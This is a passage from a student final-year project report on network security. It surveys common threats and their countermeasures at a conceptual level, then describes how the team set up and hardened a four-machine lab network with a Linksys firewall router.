- If the packet was encapsulated under the security protocol:

Is there correct key material (usually contained in a data structure called a “security

association") required to decapsulate it? Should the resulting packet (after decapsulation)

be accepted?

A second stage of packet filtering occurs at this point. Notice that a packet may be

successfully decapsulated and still not be accepted (e.g., a decapsulated packet might

contain an illegal network source IP address such as 127.0.0.1).

A security endpoint makes similar decisions when an outgoing packet is ready to be sent:

- Is there a security association (SA) that should be applied to this packet?

If there are several applicable SAs, which one should be selected?

38

- If there is no SA available, how should the packet be handled? It may be forwarded to

some network interface, dropped, or queued until an SA is made available, possibly after

triggering some automated key management mechanism such as the IPSEC ISAKMP

protocol.

Observe that because these questions are asked on packet-by-packet basis, policy filtering

must be performed, and any related security transforms applied, quickly enough to keep

up with network data rates. This implies that in all but the slowest network environments

there is insufficient time to process elaborate security languages, perform public key

operations, consult large tables, or resolve rule conflicts in any sophisticated manner.

Implementations of Network Layer Security services, including IPSEC and most

firewalls, therefore, usually employ very simple, filter-based languages for configuring

their packet-handling policies. In general, these languages specify routing rules for

handling packets that match bit patterns in packet headers, based on such parameters as

incoming and outgoing addresses and ports, services, packet options, etc.

2.6 Internal Network Security

Although focusing on securing the network’s perimeter is important, securing it internally

is equally important. If by some way a hacker manages to get in the network, he should

not be able to wander around easily without getting caught. Therefore, one should apply

the following to make the internal network secure:

39

• Patch and update all PCs before they are connected to the network, and then on a

regular basis. Note that patches need to be tested to avoid having problems with

databases or applications [3].

• System administrators should use one-time passwords only. In this way, in case a

hacker cracks the Admin’s password, it would only be valid for this one session.

An example of one-time password mechanism is the secur-ID by RSA [3].

• When an application is installed, some service accounts may be created. They are

accounts which do not have a human user associated to them. These accounts are

assigned default passwords that will most likely never be changed. Therefore, it is

important for an administrator to regularly change these passwords and monitor

the logs of these service accounts.

• Monitoring of logs is important: administrators should regularly read the logs to

monitor any unusual use of an account. Many freeware tools (such as log-IDS by

Adam Richard [3]) can help decipher the logs (which otherwise are almost

impossible to read) in something that the administrator can understand. Moreover,

by using a centralized syslog server, it will be much more difficult for hackers to

access them and edit them.

• Also, available freeware such as EventAlarm are useful when the Administrator

want to monitor a user’s logging in and out in a fast way. Such a freeware gives

pop out screen alarms to the administrator whenever user X or Y logs on or off.

Moreover, this freeware can be licensed and additional options could be added so

that alarms are given in various situations.

40

• Segregating the network can reduce vulnerabilities. In this way, a user will have

specific privileges and would not be able to access all parts of the networks (like

vital servers, or other department’s files). So if ever a hacker cracks a user ID and

password, less damage will be made if there is segregation: he won’t be able to

access the whole network.

If these rules are properly followed in our FYP, potential problems can be lessened

whether coming from a hacker that’s got in, or a legal user that has bad intentions.

2.7 Survey of Most Common Threats

We will begin explaining attacks automated by malicious code then we will explain

hacker attacks not automated by malicious code. DoS attacks will constitute a section on

their own due to the fact they are the most widespread attack on the Internet. We will end

this section by an explanation of social engineering attacks.

2.7.1 Attacks Automated by Malicious Codes

Malicious code is a piece of software which can damage or alter data and programs on a

system without permission and notice of the user. The sequence of instructions are used

to intentionally cause adverse affects to the system.

41

Figure 2.2: Classification of malicious code

We can see from the above figure that there are two types of malicious codes: needs host

program and independent. Needs host program are fragments of programs that can not

exist independently of some actual application program, utility or system program.

Independents are self contained programs that can be run by the operating system.

1. Trojan Horse

A Trojan horse is a malicious, security breaking program that is disguised as something

benign, such as a game, a directory lister or an archiver. The software is wrapped together

with the malicious code into a single file or program. The program appears to be

performing a useful function but it may also be quietly performing some harmful or

unwanted action such as deleting the victim’s files. The malicious code is typically a

back door, also known as an illicit server, but it can be a virus, worm or any other kind of

code that allows the attacker to do damage. The software is joined together with the

42

malicious code into a single file. Common ways to spread Trojan Horses are email, IRC

(Internet Relay Chat), and websites. An example of a Trojan horse file is: openme.gif.exe

(an extension is added to a seemingly harmless file). When the Trojan horse is executed it

will start its malicious job. If the job consist of planting a back door the attacker will be

notified (by email or IRC). Now the attacker can use the victim computer as a zombie in

a DDoS (Distributed Denial of Service; explained in a separate section later) attack to

flood a target system. The attacker can also remotely control the infected computer (open

the CD-ROM, send messages, open websites, reboot, listen to the microphone input,

delete files). The two most famous software to create back doors are BackOrrifice and

NetBUS. The backdoors are sent to the victim as Trojan horses (disguised as a harmless

program).

2. Virus

The virus is the most common type of malicious code. It can infect systems by attaching

itself to files and programs. Just like its biological counterpart, it needs a host to infect. A

virus is usually a program that needs to be executed by a user before it can do any

damage. For example, a virus attached to an email message is usually only harmful when

a user opens the attachment. Unlike a worm, a virus can not infect other computers

without assistance. It is propagated for example by humans trading programs with their

friends or by E-mail. The virus might only propagate itself and then allow the program to

run normally (without doing further damage). However, usually, after propagating

silently for a while, it starts doing things like writing cute messages on the terminal or

playing strange tricks with the display or even in extreme cases nuking the entire user’s

files.

43

So in summary the four phases of the life of a virus (after being executed) are:

The dormant phase (not all viruses have this stage): The virus is idle the virus will

eventually be activated by some event, such as a date, the presence of another program or

file, or the capacity of the disk exceeding some limit.

The propagation phase: The virus places an identical copy of itself into other programs or

into certain system areas on the disk. Each infected program will now contain a clone of

the virus, which will itself enter a propagation phase.

The triggering phase: The virus is activated to perform the function for which it was

intended. As with the dormant phase, the triggering phase can be caused by a variety of

system events such as a count of the number of times the virus has copied itself.

The execution phase: The function is performed. The function may be harmless, such as a

message on the screen, or damaging, such as the destruction of programs and data files.

There are also different types of computer viruses:

Figure 2.3: Main types of viruses

Memory-resident virus: Lodges in main memory as part of a resident system program.

From that point on, the virus infects every program that executes.

44

Program file virus: This is the most common type of virus; it attaches itself to executable

files such as .EXE and .COM. The file acts as a carrier and when the file is executed or

opened, the malicious code executes and the virus spreads to infect other files.

Figure 2.4 Program File Virus

Polymorphic virus: This type of virus has the ability to change its signature to avoid

detection by anti-virus software. It attempts to trick anti-virus software by slightly

modifying its own code when it spreads to other files. A polymorphic virus can modify

itself by encrypting or compressing part of its code.

Boot Sector Virus: This type of virus attaches itself to the boot sector of a floppy or hard

disk. When the computer boots, the virus will reside in its memory and infect other disks.

Modern main boards provide a BIOS option to enable boot sector virus protection, which

basically prevents modifications to the boot sector.

Stealth Virus: This type of virus attempts to hide itself to avoid detection by anti-virus

software. It attempts to misguide services that used to detect the virus. When the infected

file or boot sector is scanned by anti-virus software, the virus attempts to return the

properties of the original clean version of the file or boot sector.

45

Macro Virus: Macro viruses exploit vulnerabilities inherent to macro languages such as

Visual Basic in Microsoft Office. This type of virus is often found in Word documents.

When a user opens the document the malicious code is executed.

Email Virus: A more recent development in malicious software is the e-mail virus.

Rapidly spreading e-mail viruses make use of a Microsoft Word macro embedded in an

attachment. If the recipient opens the e-mail attachment, the Microsoft Word macro is

activated then: the e-mail virus sends itself to everyone on the mailing list in the user’s e-

mail package and the virus does local damage.

3. Worm

A worm is similar to a virus but there is one main important difference: a worm doesn’t

need to attach itself to a file or program to be reproduced and executed as a virus does. A

worm is self-contained, it can replicate itself and infect entire networks. Because of the

recursive structure of the propagation, the spread rate of worms is very fast and poses a

big threat on the Internet infrastructure as a whole. Examples of Worms are: MyDoom,

Netsky, Bagle, Blaster, Code Red, Nimda.

4. Logic Bomb

A logic bomb is a smart piece of malicious code that executes only when certain

conditions are met; it is triggered when a certain event occurs. An example is a virus that

executes on April Fool’s day (but infected the system long before that date) or a

format.exe command that is executed only when the user logs on with administrative

permissions. Another example of a logic bomb sends a note to the hacker when the

infected computer is on the internet and runs a specific application such as MS Word.

46

This bomb does not actually begin the attack but tells the hacker that the victim has met

needed state for an attack to begin.

Figure 2.5: Logic Bomb

1. Attacker implants logic bomb

2. Victim reports installation

3. Attacker sends attack message

Countermeasures against malicious code: Prevention and detection of malicious code

typically involves anti-virus and other detection products at gateways, mail servers, and

workstations. Those products generally scan messages for known signatures of a variety

of malicious code, or potentially dangerous behavioral characteristics. Differences

between products exist in detection capabilities and the range of malicious code included

in their signatures. Detection products should not be relied upon to detect all malicious

code. Additionally, anti-virus and other products that rely on signatures generally are

ineffective when the malicious code is encrypted. For example, VPNs, IPSec, and

encrypted e-mail will all shield malicious code from detection. Heuristic anti-virus

products generally execute code in a protected area of the host to analyze and detect any

hostile intent. Heuristic products are meant to defend against previously unknown or

47

disguised malicious code. Malicious code may be blocked at the firewall or gateway. For

example, a general strategy might be to block all executable e-mail attachments, as well

as any Active-X or Java applets. A more refined strategy might block based on certain

characteristics of known code. Protection of servers involves examining input from users

and only accepting that input which is expected. This activity is called filtering. If

filtering is not employed, a Web site visitor, for instance, could employ an attack that

inserts code into a response form, causing the server to perform certain actions. Those

actions could include changing or deleting data and initiating fund transfers. Protection

from malicious code also involves limiting the capabilities of the servers and Web

applications to only include functions necessary to support operations. An additional

detection control involves network and host intrusion detection devices. Network

intrusion detection devices can be tuned to alert when known malicious code attacks

occur. Host intrusion detection can be tuned to alert when they recognize abnormal

system behavior, the presence of unexpected files, and changes to other files.

2.7.2 Hackers Attacks (not automated by malicious codes)

1. Eavesdropping

The name eavesdropping comes from the fact that this technique involves secretly

listening to the data traveling through the attacked network. Other names for

eavesdropping include sniffing and snooping. Eavesdropping is only possible because

most data sent through connections are sent as plaintext and are unencrypted. Thus, a

hacker can just listen to the connection stream between the two connected users and get

whatever information he needs. This method is usually employed by those who are

unwilling to take large risks as this method is a very low-risk method. There is almost no

48

chance of getting caught when this method is used as no intrusion is involved and the

hacker can back off quickly without a trace if anything goes wrong. This method is also

used for those who want to listen to what is shared between two people, be it secret data

or just a personal conversation. In this respect, this method is the best for spies and

blackmailers.[14]

2. IP spoofing

Most networks and operating systems use the IP address of a computer to identify a valid

entity. In certain cases, it is possible for an IP address to be falsely assumed (identity

spoofing). An attacker might also use special programs to construct IP packets that

appear to originate from valid addresses inside the corporate intranet. After gaining

access to the network with a valid IP address, the attacker can modify, reroute, or delete

your data. The attack may be directed to a specific computer addressed as though it is

from that same computer. This may make the computer think that it is talking to itself.

This may cause some operating systems such as Windows to crash or lock up.

3. Man in the middle attack

As the name indicates, a man-in-the-middle attack occurs when someone between you

and the person with whom you are communicating is actively monitoring, capturing, and

controlling your communication transparently. For example, the attacker can re-route a

data exchange. When computers are communicating at low levels of the network layer,

the computers might not be able to determine with whom they are exchanging data.

Session hijacking occurs through the following scenario. First, the attacker watches a

session open on a network. Once authentication is complete, he attacks the client

computer to disable it, and use IP spoofing to claim to be the client who was just

49

authenticated and steal the session. Man-in-the-middle attacks are like someone assuming

your identity in order to read your message. The person on the other end might believe it

is you because the attacker might be actively replying as you to keep the exchange going

and gain more information.

Countermeasure: This attack can be prevented if the two legitimate systems share a

secret which is checked periodically during the session.

4. Server spoofing

A C2MYAZZ utility can be run on Windows 95 stations to request LANMAN (The

LanMan password hash is used by Windows NT for authenticating users locally and over

the network [16]) authentication from the client. The attacker will run this utility while

acting like the server while the user attempts to login. If the client is tricked into sending

LANMAN authentication, the attacker can read their username and password from the

network packets sent. [15]

Countermeasure: New operating systems are not vulnerable.

5. DNS poisoning

This is an attack where DNS information is falsified. This attack can succeed under the

right conditions, but may not be real practical as an attack form. The attacker will send

incorrect DNS information which can cause traffic to be diverted. The DNS information

can be falsified since name servers do not verify the source of a DNS reply. When a DNS

request is sent, an attacker can send a false DNS reply with additional bogus information

which the requesting DNS server may cache. This attack can be used to divert users from

a correct web server such as a bank and capture information from customers when they

attempt to logon. [15]

50

6. Password cracking

Sometimes in case of a partial break-in, the encrypted password file of a company might

be exposed to a hacker (or cracker in that case). If it happens, the attacker will start

password cracking the file, namely trying all the possible combinations with the idea to

find the weakest passwords and gain privileges later on. [17]

Countermeasure: In case the company is aware that its passwords' file has been

compromised, it should immediately notify all employees to change their passwords, so

even if weak passwords are exposed, they wouldn't be valid ones anymore. However, if

the company is not aware of its password file exposure, it should constantly try to crack

its password file just like an attacker would do and filter out the weakest passwords.

2.7.3 DoS

A DoS (Denial of Service) attack is an attempt to prevent legitimate users of a service or

network resource from accessing that service or resource. DoS attacks are not targeted at

stealing, modifying or deleting information.. A DoS attack comes in many forms like

cutting of the power to a system or flooding a system with seemingly legitimate network

traffic, anything that will results in a denial of service. DoS attacks usually make use of

software bugs to crash or freeze a service or network resource, or bandwidth limits by

making use of a flood attack to saturate all bandwidth.

Different methods of DoS:

• DoS

DoS attack is when the attacker launches an attack from his or her own computer, this

is done by sending packets of data to the remote computer, for each packet sent the

target machine receives one. This is a very uncommon form of denial of service

51

because the attack most of the time is very unsuccessful and at times can be easily

traced. DoS attacks are usually carried out by amateur script kiddies.

Figure 2.6: DoS

• DDoS

A distributed denial of service attack is when an attacker attacks from multiple source

systems. DDoS attack is generally more effective to bring down huge corporate sites

than DoS attacks. The attacker can put in order a large number of computers to

connect to a website at the same time. The web server has a maximum allowed

number of client connections. If this number is attained, the server will deny further

connections. So there will be a denial of service. Usually the attacker does not own all

these computers so he uses Trojan horses with back doors as malicious code to infect

computers which become zombies (also called “secondary victims”). The users of the

infected computers are not aware that their computers are used in a DDoS attack. DoS

bots (small word for robot, program for flooding present on the secondary victims

computer) usually have standard flooding, such as ICMP, UDP, TCP, and SYN

Flooding. The Internet services and resources under the attack are “primary victims”.

52

A typical DDoS attack consists of master, slave, and victim. Master being the

attacker, slave being the compromised systems and victim being the attacker’s target.

Figure 2.7: DDoS Attack

• DRDoS

DRDoS is when an attacker sets his bots to flood different intermediate hosts with

spoofed packets. For example the attacker sets half his bots to flood yahoo.com with

spoofed ICMP packets and half ebay.com with spoofed ICMP packets. The spoofed

packets seem to have microsoft.com as a source so yahoo.com and ebay.com flood

microsoft.com (ebay.com and yahoo.com will reply to the spoofed source). For each

packet the attacker sends to yahoo.com or ebay.com, yahoo.com or ebay.com may

have thousands of machines on the same IP Address. Each of these machines will

reply to the spoofed ICMP packet therefore amplifying the power of the attack

greatly.

53

Figure 2.8: DRDoS- Red Lines: Connection from attacker computer to zombies computers. Blue Lines: Zombies sending spoofed ICMP packets. The ICMP packets look like they come from the Internet Core router the attacker wants to attack. Green Lines: Each of the computers connected to ebay.com, yahoo.com, cnn.com and Amazon.com are replying to the spoofed ICMP packets therefore flooding the Internet core router.

54

Figure 2.9 DRDoS- Malicious SYN packets are being "Reflected" off innocent TCP servers. Their SYN/ACK responses are being used to flood and attack the target network. There are also different Types of DoS Attacks:

• TCP SYN Flood Attack

A TCP session is established by using a three-way handshake mechanism, which

allows the client and the host to synchronize the connection and agree upon the initial

sequence numbers. When the client connects to the host, it sends a SYN request to

establish and synchronize the connection. The host replies with a SYN / ACK, again

to synchronize. Then the client acknowledges it received the SYN/ ACK packet by

sending and ACK. When the host receives the ACK the connection will become

OPEN, allowing traffic from both sides (full-duplex). The connection remains open

55

until the client or the host issues a FIN or RST packet, or the connection times out. If

you flood a remote computer with SYN packets it is going to send back a SYN/ACK

packet so bandwidth will be wasted. In addition, in a TCP SYN flood attack the

connection is not completed so the target computer is left waiting for an ACK,

therefore it is possible to max out the remote computers connection queue.

Connections from legitimate users will be rejected in this case. The amount of

bandwidth this attack uses is very minimal, although if done on a very large scale it

could affect the bandwidth of a web server.

Figure 2.10: TCP 3 way handshake

Countermeasure: Many routers and other network nodes today are able to detect SYN

floods by monitoring the amount of unacknowledged TCP sessions and kill them

before the session queue is full. They can often be configured to set the maximum

allowed number of half-open connections, and limit the amount of time the host waits

for the final acknowledgement. Without these preventive measures, the server could

eventually run out of memory, causing it to crash entirely.

• UDP Flood Attack

56

UDP flooding is when the attacker sends garbage packets from UDP port(s) to UDP

port(s) on the remote computer, since UDP is a connectionless protocol (no

handshake mechanism) UDP flooding can be very effective and easy to abuse for

flood attacks. A common type of UDP flood attack often referred to as a Pepsi attack,

is an attack in which the attacker sends a large number of forged UDP packets to

random diagnostic ports on a target host. The CPU time, memory, and bandwidth

required to process these packets may cause the target to become unavailable for

legitimate users.

Countermeasure: To minimize the risk of a UDP flood attack, disable all unused

UDP services on hosts and block the unused UDP ports if you use a firewall to

protect your network.

• Ping of Death Attack

An oversized ICMP datagram (size larger than 65,535 bytes) can crash IP devices that

were made before 1996 (Windows 95, NT4).

Countermeasure: Modern operating systems and network devices safely disregard

these oversized packets. Older systems can usually be updated with a patch.

• Smurf Attack

An attack where a ping request is sent to a broadcast network address with the

sending address spoofed so many ping replies will come back to the victim and

overload the ability of the victim to process the replies. This attack is made possible

mostly because of badly configured network devices that respond to ICMP echoes

sent to broadcast addresses. The amount of traffic sent by the attacker is multiplied by

57

a factor equal to the number of hosts behind the router that reply to the ICMP echo

packets.

Figure 2.11: Smurf Attack

Besides the target system, the intermediate router is also a victim, and thus also the

hosts in the bounce site. A similar attack that uses UDP echo packets instead of ICMP

echo packets is called a Fraggle attack.

Countermeasure: It is difficult to prevent Smurf attacks entirely because they are

made possible by incorrectly configured networks from a third party. The Smurf

Amplifier Registry (SAR) http://www.powertech.no/smurf/ Netscan.org is one of

several publicly available databases that can be used to configure routers and

firewalls to block ICMP traffic from these networks. The Smurf Amplifier Registry

(SAR) can be downloaded in Cisco ACL format. If you use Cisco routers, make sure

all interfaces are configured with the no ip-directed broadcast command (default

since IOS 12.0).

58

• Teardrop Attack

A normal packet is sent then a second packet is sent which has a fragmentation offset

claiming to be inside the first fragment. This second fragment is too small to even

extend outside the first fragment. This may cause an unexpected error condition to

occur on the victim host which can cause a buffer overflow and possible system crash

on many operating systems. [15]

Countermeasure: Today’s implementations of the TCP/IP stack safely disregard such invalid packets.

2.7.4 Social Engineering

Before an attacker attempts to gain access to a secured system, he must first know certain

things about the target system. Although an attacker often uses technology, he may

simply try to ask for the information. If the right person asks, he or she will often get it all

too easily.

Social Engineering is the art of having people do what you want, or give you info on

passwords and almost anything, without them knowing they are doing so. Social

Engineering applies to every aspect of the internet and also to the real world.

This can start with a simple chat in a chat room or a phone call to a business that

someone wants to maybe gain access too from the internet without having to hack in. In a

business situation of social engineering, the hacker starts doing research on the company

so he will most likely know every department that the company has. He could then try to

phone up a department and say he was a member of the IT department and that the

passwords are being changed for routine security reasons then he would tell the user to

change his/her password to what ever he wants. He could then simply logon to their

system using the new password and he’s in.

59

A social engineering attack usually involves an attacker impersonating a seemingly

harmless person to deceive company personnel to obtain information. Obtaining that

information may be the actual goal itself, or it may be used to aid the attacker in

penetrating a secured system. The information can be a user ID, password, access code

and other type of sensitive information, but can also be information that seems harmless

to share. A company phoned by a student conducting a survey about which operating

systems and software they use may actually be giving valuable information to a malicious

attacker. Malevolent competitors and ex-employees who want to settle a score, sabotage a

business, or steal a company secret often use social engineering techniques to reach their

malicious goals.

Social engineering attacks are often more complicated and require careful preparation,

acting and persuasion skills. A social engineer collects bits and pieces of information that

will lead him to his goal, typically using its most valuable tool, a phone. Calling a

company and bluntly ask for the information may alarm the employee on the other side of

the phone and ruin the entire attack before it really got started. So before the attacker can

persuade a victim to simply hand out information, he needs to crawl into the skin of

someone the victim will gladly give the information to, someone who works in the same

company for example. To do that he needs to know the company’s lingo, department

structure, internal phone numbers, and anything else that will make him an “insider”.

Once the attacker talks the talk, knows who to impersonate and who to ask what, it is just

a matter of asking the right questions without raising any suspicion to get everything he

wants.

60

Social engineers have found a relatively new way to attempt to obtain sensitive

information from naïve people, without having to pay them a visit or call them by phone:

email. The attacker sends malicious e-mail messages that seem to be legit and even have

a valid sender address. The message may contain a link that takes the victim to a website

that looks exactly like a site where he or she frequently buys online products with a credit

card number. Or the message may seem to have been sent by the IT department, and

includes an attachment that is supposedly the latest anti-virus update that must be

installed immediately. In reality, the attachment could be a Trojan horse creating a

backdoor for the attacker or logging keystrokes that are sent to the attacker by e-mail.

The most important thing in social engineering is building trust. If a hacker builds up

some trust with a user then he is going to find it easier to manipulate him to do what he

wants.

Countermeasure: Many companies acknowledged the necessity of technology such as

firewalls, intrusion detection systems, and advanced authentication systems to secure

their information. However, this technology does not make them less vulnerable to a

social engineer. It may actually lead to a false sense of security, which may make them an

even easier target. To prevent successful social engineering attacks security policies must

be implemented and enforced. All employees must be informed and trained to recognize

and appropriately respond to a potential social engineering attack.

One of the most important policies that should be implemented is verification of requests.

Not only the identity of the requestor should be verified, but also the request he or she is

making. A simple method to verify the caller’s ID is to call the person back at the phone

number listed in the company’s phone directory. If someone outside the company asks for

61

inside information, he or she should be forwarded to a manager or the Information

Security department. When a copier maintenance person enters a building, the

receptionist should verify the appointment and ask for an ID.

The best defense against social engineering attacks by e-mail is using certificates for

encrypting and signing e-mail messages, allowing a recipient to positively identify the

sender.

By following some basic rules and using common sense, most social engineering attacks

can be prevented. It is essential to educate employees about these types of attacks and the

methods of a social engineer, because in any security system people are really the

weakest link.

62

3. Our Network Design

We now tackle the design part of our FYP, i.e. building our Network.

Mr. Ziad Shaaban, from the computer labs, provided our team with 4 Pentium3

computers (that we will place in Mr. Khaled Joujou’s lab). Therefore, we agreed with Mr/

Majari that our network will include: one Windows and one UNIX workstation, in

addition to one windows and one UNIX server.

3.1 Topology

The network topology refers to its shape, or its layout. The topology defines how nodes

are connected to each others and how they communicate between them [8]. The figure

below illustrates the most common network topologies.

Figure 3.1: Network Topologies [8]

As was described in section 1 of this report, the most common topologies businesses use

are hierarchal stared networks. Therefore, we have decided to use this kind of topology

when building our network, since the ultimate goal is to simulate we are a business firm.

63

3.2 Securing the Perimeter

The most common way of implementing Perimeter Security is using Firewalls [9]. A

large array of Firewall exist today, each brand (and even each model within brand) focus

on better security for a given networked environment. From a hacker’s perspective, there

are numerous targets: Router, Switches, Hosts, Application, but also the network as a

whole (DoS attacks).

Firewalls are hardware devices (though some software firewalls exist), that filter

information coming through and out of a secured network. Firewalls generally use the

following methods to do their job [10]:

• Packet filtering - Packets (small chunks of data) are analyzed against a set of

filters. Packets that make it through the filters are sent to the requesting system

and all others are discarded.

• Proxy service - Information from the Internet is retrieved by the firewall and then

sent to the requesting system and vice versa.

• Stateful inspection - A newer method that doesn't examine the contents of each

packet but instead compares certain key parts of the packet to a database of

trusted information. Information traveling from inside the firewall to the outside is

monitored for specific defining characteristics, and then incoming information is

compared to these characteristics. If the comparison yields a reasonable match,

the information is allowed through. Otherwise it is discarded.

Some common Firewall Filters (for inside-to-outside protection) are [11]:

64

• IP addresses - For example, if a certain IP address outside the company is reading

too many files from a server, the firewall can block all traffic to or from that IP

address.

• Domain names - A company might block all access to certain domain names, or

allow access only to specific domain names.

• Protocols - A company might set up only one or two machines to handle a

specific protocol and ban that protocol on all other machines. Protocols include:

IP, TCP, HTTP, FTP, UDP, ICMP, SMTP, SNMP, Telnet…

• Ports - Any server machine makes its services available to the Internet using

numbered ports, one for each service that is available on the server. For example,

if a server machine is running a Web (HTTP) server and an FTP server, the Web

server would typically be available on port-80, and the FTP server would be

available on port 21. A company might block port-21 access on all machines but

one inside the company.

• Specific words and phrases - This can be anything. The firewall will sniff (search

through) each packet of information for an exact match of the text listed in the

filter and block any packet with the word or phrase.

Firewalls can protect or help protect us (with additional hardware and software) from

(outside-to-inside security):

• Remote login - When someone is able to connect to your computer and control it

in some form. This can range from being able to view or access your files to

actually running programs on your computer.

65

• Application backdoors - Some programs have special features that allow for

remote access. Others contain bugs that provide a backdoor or hidden access,

which provides some level of control of the program.

• SMTP session hijacking - SMTP is the most common method of sending e-mail

over the Internet. By gaining access to a list of e-mail addresses, a person can

send unsolicited junk e-mail (spam) to thousands of users. This is done quite

often by redirecting the e-mail through the SMTP server of an unsuspecting host,

making the actual sender of the spam difficult to trace.

• Operating system bugs - Like applications, some operating systems have

backdoors. Others provide remote access with insufficient security controls or

have bugs that an experienced hacker can take advantage of.

• Denial of service - This type of attack is nearly impossible to counter. What

happens is that the hacker sends a request to the server to connect to it. When the

server responds with an acknowledgement and tries to establish a session, it

cannot find the system that made the request. By inundating a server with these

unanswerable session requests, a hacker causes the server to slow to a crawl or

eventually crash.

• E-mail bombs - An e-mail bomb is usually a personal attack. Someone sends you

the same e-mail hundreds or thousands of times until your e-mail system cannot

accept any more messages.

• Macros - To simplify complicated procedures, many applications allow you to

create a script of commands that the application can run. This script is known as a

66

macro. Hackers have taken advantage of this to create their own macros that,

depending on the application, can destroy your data or crash your computer.

• Viruses - Probably the most well-known threat is computer viruses. A virus is a

small program that can copy itself to other computers. This way it can spread

quickly from one system to the next. Viruses range from harmless messages to

erasing all of your data.

• Spam - Typically harmless but always annoying, spam is the electronic equivalent

of junk mail. Spam can be dangerous though. Quite often it contains links to Web

sites. Be careful of clicking on these because you may accidentally accept a

cookie that provides a backdoor to your computer.

• Redirect bombs - Hackers can use ICMP to change (redirect) the path information

takes by sending it to a different router. This is one of the ways that a denial of

service attack is set up.

• Source routing - In most cases, the path a packet travels over the Internet (or any

other network) is determined by the routers along that path. But the source

providing the packet can arbitrarily specify the route that the packet should travel.

Hackers sometimes take advantage of this to make information appear to come

from a trusted source or even from inside the network! Most firewall products

disable source routing by default.

It is evident that some of the above attacks are very hard to prevent just using a firewall,

and other software/hardware devices are needed [9].

67

3.3 Our Network

With the 4 computers available, we have researched computer stores in the great Beirut

area for firewalls and switches. We found a very interesting product that suits our needs:

the Linksys BEFSX41 EtherFast Cable/DSL Firewall Router w/ 4-Port Switch/VPN

endpoint.

Basically, this product has a 4 port built in switch, VPN Endpoint, VPN Pass-Thru,

Firewall and DHCP Server functionalities [14].

Its security functionalities are as follow: IPSec Pass-Thru • PPTP Pass-Thru • SPI

(Stateful Packet Inspection) • DoS (Denial of Service) Attack Detection • URL Content

Filtering • DMZ • Cookies Blocking • Java Blocking • ActiveX Blocking • NAT [14]

This product was found at www.pcandparts.com, a Lebanese online computer store, for

only 89.00$.

The following is an illustration of our network:

68

4. Installing the Network

At the beginning of the spring semester, the FEA IT Unit provided us with four

computers equipped with pentium2 processors, having 1.5GB hard disk and 64MB

Memory. Clearly, these computers’ specifications were not to today’s standard. We

therefore decided to work on windows 2000 (1 server, 1 workstation) and Fedora Core 3

(also 1 server and 1 workstation).

However, for windows to work properly, we had to increase the Memory of the 2

computers we were going to install windows OS on from 64MB to 256MB (keeping in

mind that these were scarce SD-RAMS). Moreover, to not have problems with Hard Disk

space and stay on the safe side, we replaced all the 1.5GB drives by 3GB drives. In

addition to this, the computer on which we wanted to install the Fedora Server had a

faulty CD Drive, which prompted us to change it with a new one.

Also, when installing the Fedora Core 3 OS, we were having problems with incomplete

and very slow installation processes due to the low memory space (64MB). Since it was

unnecessary to buy additional memory (Fedora 3 works fine on 64MB), we had to

manually unplug memory from the computers equipped with windows and use them in

the Fedora PCs just for the installation time.

All in all, installing the OS on the four different computers was a lengthy process due to

the low specifications and faulty hardware on the PCs we were provided with.

69

4.1 Plugging the Network and Creating a Domain

Now that our 4 PCs were up and running, it was time to plug them to the Linksys device

(firewall/router with 4 port switch), configure the device and create a domain with

different users.

4.1.1 Setting Up the Linksys Product

First, we started by defining the IP addresses. The external IP address (i.e. Router IP

address) was chosen to be 192.168.1.1 (with subnet mask of 255.255.255.0). The internal

network IP addresses were 192.168.100.100 for the Windows workstation,

192.168.100.101 for the Windows server, 192.168.100.102 for the Fedora workstation

and 192.168.100.103 for the Fedora server. Note that “Natting”, which allows multiple

computers to share on internet connection, was enabled. At first, we thought that giving

IP addresses on the external and internal side who roughly looked the same would be

dangerous. But with Honey-Potting options (see section 4.5) this is not a big threat.

As for the firewall security settings, we started by setting then to maximum security. We

enabled Stateful Packet Inspection (SPI), as well as enabled filtering the Proxy, Cookies,

Java Applets and ActiveX. Also, we blocked anonymous internet requests to enable the

router to drop unaccepted TCP requests and ICMP packets from the internet (in our case,

from the hackers). Note that this feature can be disabled in the case the Hackers’ team is

unsuccessful in their outside attacks. Another important aspect of firewall security is

closing port 113. This port is a service port that most applications do not need. Closing it

would prevent intruders from attacking the router through the internet. Again, if the

70

hackers’ team is unsuccessful in attacking us with this feature on, we can open port 113

to help them.

The firewall also has a feature that can restrict internet access (i.e. the device will only

work as a simple switch) all the time or during certain period of time. However, we

turned that option off as a company would ideally have internet access 24 hours a day.

Finally, an important feature that we recommend to use in the firewall is the “Log

Feature”. The Log screen provides information on all the log activities. Downloading a

logviewer software can also enhance this option by generating files to keep permanent

record of the log activities. The option permits the user to:

• Get logs of all incoming and outgoing activities (useful when running website or

FTP server).

• Get system logs, i.e. activities such as warm boot and access to the router based

utility.

• Get access logs, i.e. keep track of all incoming and outgoing activities via the

internet (in our case, the hackers’ team will connect in the internet port).

By monitoring those log files regularly, our team can know when the hackers tried to

attack our system from the outside by sending packets for example.

4.1.2 Creating the Domain

We created a Kerberos domain on the windows 2000 server that we called FYP. Also, as

a requirement put forth by Deloitte, we created about 20 user accounts that we distributed

in different user groups having different prerogatives and power. These users were given

consistent usernames (e.g. jmoukarzel for Jean Moukarzel) and dictionary words

71

passwords, as a request from Deloitte, to simulate real life situations where most

employees set easy passwords for their accounts.

4.2 Tightening Security

After setting up the domain and firewall/router settings, the next step is to tighten our

network’s security.

4.2.1 Patches on Windows

Installing service packs and patches is really important on windows 2000. One should

always check the Microsoft website for any updates and download the newest patches

and service packs to make sure the network is secure. This is precisely what we did, by

downloading the patches talked about in section 2.4. Also, in section 4.4, we will see

what tool can be used to update security.

4.2.2 Disabling USB ports to Protect Against Flash Drives

Flash drives are small solid state memory sticks that are about the size of a highlighter

pen and can hold anywhere from 1Mb to 1GB of data. They're incredibly light weight,

very portable (some models function as key chains) and they are compatible with any PC

equipped with a USB port and running Windows 2000/XP, Mac OS 9-10X or Linux

2.4.17. (Windows 9x PC's require a one time driver installation). USB Flash Drives have

fast transfer rates (1Mb/sec), no moving parts, and they don't require a separate power

source or batteries. Using flash drives is very simple: they just have to be plugged into

the USB port of the PC and Windows plug and play will immediately see it as an

additional drive. Flash drives hold more data than a floppy, are more portable than ZIP

72

drives and other remote storage devices, and more convenient (and less fragile) than CD-

RW disks. In short, USB Flash Drives may just be the perfect and most affordable

removable storage medium.

Needless to say, USB Flash Drives are very useful, but they also introduce big threats to a

company’s network, such as [18]:

• Viruses: Users can bring in infected documents from home, or take home a

business document to an infected PC, update it, and return it to a corporate file

